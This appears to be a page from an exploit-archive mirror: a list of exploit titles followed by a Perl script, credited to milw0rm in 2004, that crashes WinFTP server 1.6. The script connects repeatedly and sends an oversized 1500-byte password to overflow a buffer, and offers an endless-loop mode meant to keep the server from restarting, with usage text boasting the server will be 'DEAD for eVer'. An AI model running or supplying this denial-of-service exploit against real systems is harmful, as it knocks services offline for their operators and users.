
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
79 lines
2.4 KiB
Prolog
Executable file
79 lines
2.4 KiB
Prolog
Executable file
#!/usr/local/bin/perl -w
|
|
|
|
###########################################################
|
|
###########################################################
|
|
## WinFTP server ver 1.6 D.o.S Exploit
|
|
## Discovered,exploited by KaGra
|
|
## Tested on WinXP SP1 English version
|
|
##
|
|
## Sending 40 times a username and a buffer of 1500
|
|
## bytes as pass,will crash the server,as soon as is
|
|
## not minimized in Target computer.If he is minimized,he
|
|
## will crash as soon as he will stop be minimized.If U use
|
|
## this sploit in a loop without ending,server will be unable
|
|
## to restart,because he starts NOT minimized of course...
|
|
## Except USER and PASS,almost all commands of ftp service are vuln...
|
|
############################################################
|
|
############################################################
|
|
|
|
|
|
use Net::FTP;
|
|
|
|
if(@ARGV<2)
|
|
{
|
|
print "################# Winftp 6.0 D.o.S SploiT By KaGra ###################\n";
|
|
print "# Usage: perl agate.pl <target> <option> #\n";
|
|
print "# Option is 1 for non endless D.o.s,2 for endless D.o.s,use 1 first #\n";
|
|
print "########################################################################\n\n";
|
|
exit(0);
|
|
}
|
|
|
|
$hostname = $ARGV[0]; #Remote Host to D.o.S!
|
|
$username = 'kagra'; #AnythinG HeRe!
|
|
|
|
print "\n[*]BuiLDinG BuFfer...\n";
|
|
|
|
$password = 'A'x1500 ; #OverFlow BuffEr!
|
|
print "[*]ConnectinG To TarGet...\n";
|
|
|
|
|
|
|
|
|
|
if($ARGV[1]==2)
|
|
{
|
|
print "[*]SenDing DeViL In EndLeSS Loop,Server Will be DEAD for eVer,just stop the process...\n";
|
|
for($i=0; $i < 20; $i--)
|
|
{
|
|
XX:
|
|
$ftp = Net::FTP->new($hostname); # Connecting...
|
|
if(!defined($ftp))
|
|
{
|
|
goto XX
|
|
}
|
|
$ftp->login($username, $password); # Sending EviL BuffeR...
|
|
$ftp->quit;
|
|
}
|
|
exit(0);
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
for($i= 0; $i < 40; $i++)
|
|
{
|
|
$ftp = Net::FTP->new($hostname); # Connecting...
|
|
if(!defined($ftp))
|
|
{
|
|
print "Could not connect.If buffer has been send,then target D.o.Sed :-P.Use sploit in endless loop now,and will not restart again...\n";
|
|
sleep(1);
|
|
exit(0);
|
|
}
|
|
print "[*]SenDing DeViL...\n";
|
|
$ftp->login($username, $password); # Sending EviL BuffeR...
|
|
$ftp->quit;
|
|
}
|
|
print "SerVer Has Been D.o.sed,will be Down if he is or will be stop being minimized!Use sploit in endless loop now,and when he will be down,will not restart again...\n";
|
|
|
|
|
|
# milw0rm.com [2004-11-11]
|